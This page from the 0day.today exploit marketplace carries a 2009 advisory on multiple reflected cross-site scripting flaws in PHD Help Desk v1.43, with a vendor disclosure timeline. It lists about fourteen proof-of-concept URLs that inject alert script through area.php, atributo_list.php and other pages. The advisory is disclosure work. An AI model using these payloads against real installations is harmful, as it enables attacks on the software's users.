0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PHD Help Desk v1.43 Mutliple XSS
[================================
PHD Help Desk v1.43 Mutliple XSS
================================
################################################################################
Mutliple XSS in PHD Help Desk v1.43
Name Multiple vulnerabilities in PHD Help Dsk
Systems Affected PHD Help Desk v1.43 and possibly earlier versions
Site http://www.p-hd.com.ar/
################################################################################
############
1. OVERVIEW
############
PHD Help Desk is the software conceived for the registry and follow up of incidents in the Help Desk or Service Desk in your IT area of their company or organization.
###############
2. DESCRIPTION
###############
PHD Help Desk is vulnerable to Multiple cross-site scripting instances.
######################
3. TECHNICAL DETAILS
######################
Multiple Cross-site Scripting
++++++++++++++++++++++++++++++
Multiple pages found vulnerable to Cross-site Scripting mainly due to improper use of $_SERVER['PHP_SELF'] and lack of sanitization in user inputs.
++++
POC
++++
http://server/phd/area.php/'>alert("XSS")
http://server/phd/area.php?pagina='>alert("XSS")
http://server/phd/area.php?sentido='>alert("XSS")
http://server/phd/area.php?q_registros='>alert("XSS")
http://server/phd/area.php?orden='>alert("XSS")
http://server/phd/solic_display.php?pagina=1&q_registros=>alert("XSS")&orden=seq_solicitud_id
http://server/phd/area_list.php/'>alert("XSS")
http://server/phd/area_list.php?orden=nombre&sentido=&pagina=1&q_registros=0'>alert("XSS")
http://server/phd/atributo.php/'>alert("XSS")
http://server/phd/atributo_list.php?pagina=1'>alert("XSS")&q_registros=15&orden=activo&sentido=
http://server/phd/atributo_list.php?pagina=1&q_registros=15'>alert("XSS")&orden=activo&sentido=
http://server/phd/atributo_list.php?pagina=1&q_registros=15&orden=activo'>alert("XSS")&sentido=
http://server/phd/atributo_list.php?pagina=1&q_registros=15&orden=activo&sentido='>alert("XSS")
http://server/phd/caso_insert.php/'>alert("XSS")
Other pages may be vulnerable as well.
############
4. TimeLine
############
05/11/2009 Bug Discovered
05/11/2009 Reported to Vendor
05/11/2009 Vendor agrees to fix this in 2.00 version
Response from Vendor:
"I forgot to protect the $_GET entries, we are working in the 2.00 version and we will add this sugestion."
16/11/2009 Public Disclosure
# 0day.today [2024-09-20] #